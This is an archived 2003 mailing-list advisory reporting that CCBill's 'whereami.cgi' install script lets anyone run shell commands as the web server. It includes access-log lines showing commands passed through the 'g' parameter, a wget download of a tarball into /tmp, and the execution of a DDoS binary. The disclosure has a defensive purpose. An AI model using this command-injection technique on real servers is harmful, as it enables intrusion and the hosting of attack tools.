home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / ccbill / ccbill.txt
Encoding:
Internet Message Format  |  2003-08-20  |  3.0 KB
  1. Date: Thu, 03 Jul 2003 12:46:39 -0400
  2. From: Dayne Jordan <djordan@completeweb.net>
  3. Subject: Another overflow exploit for Apache? *RESOLVED*
  4.  
  5. Greetings again,
  6.  
  7. We found that this exploit was NOT a result of an Apache exploit.
  8.  
  9. After waiting for the culprits to attempt their mischeif again, we were
  10. waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp
  11. and executed thru Apache - not to our surprise, it appears CCBILL once
  12. again has some very exploitable 'helper' scripts they upload when installing
  13. their software.
  14.  
  15. On ALL the machines with the Ddos behavior we found, there was one common
  16. script on all of them ' whereami.cgi '. This script, when executed from
  17. the browser allows system commands to be entered and executed as the web
  18. server. We even used wget and lynx thru this command interface to upload
  19. various things into /tmp/. Our culprits were uploading old-school and common
  20. Ddos binaries, then executing them.. nothing root worthy, but nonetheless
  21. a pain in the arse.
  22.  
  23. Excerpt log entries from our test machines:
  24.  
  25. Machine getting it - how we uploaded a test binary:
  26. 216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls
  27. HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls"
  28. "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
  29.  
  30. Machine serving it:
  31. 216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET /rogue-test.tar HTTP/1.0"
  32.                     200 286720 "-" "Wget/1.5.1"
  33.  
  34. Other things we did with it:
  35. 216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET
  36.                     /ccbill/whereami.cgi?g=mkdir%20/tmp/boo
  37.                     HTTP/1.1" 200 247 "-" "Mozilla/4.0
  38.                     (compatible; MSIE 5.5; Windows 98; H010818; T312461)"
  39.  
  40. and then...
  41.  
  42. su-2.02# ls -la /tmp
  43. drwxrwxrwt   6 root    wheel    3072 Jul  3 12:42 .
  44. drwxr-xr-x  19 root    wheel     512 Mar 17 17:01 ..
  45. drwxr-xr-x   2 nobody  wheel     512 Jul  3 12:44 boo
  46. srwxrwxrwx   1 mysql   wheel       0 Jul  3 00:05 mysql.sock
  47. [snipped]
  48.  
  49. And snippet from one of the affected machines running 'hell' a simple
  50. Ddos binary:
  51. 172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell
  52.                     HTTP/1.1" 200 265 "-" "Mozilla/4.0
  53.  
  54. Once you initiate the /whereami.cgi?g=ls command from the browser, you then
  55. get an input box and an enter button on your browser - execute any command
  56. you like, including wget, lynx, tar, sh, etc etc.
  57.  
  58. This script is most likely used by CCBILL techs as part of their default
  59. installation so that they can administer/setup their necessary scripts/software. Unfortunately,
  60. there is a huge hole in this script. We have a customer who very
  61. recently had CCBILL setup their services on his website and the very same
  62. 'whereami.cgi' exists even on this current date build.
  63.  
  64. So in short, those of you who use CCBILL make sure to remove or render
  65. useless the 'whereami.cgi' script in your /ccbill directory(ies). Across
  66. all our machines where we know CCBILL exists we've found this script on
  67. every one so far - and removed it ;)
  68.  
  69. D.
  70. =========
  71.  
  72.  
  73.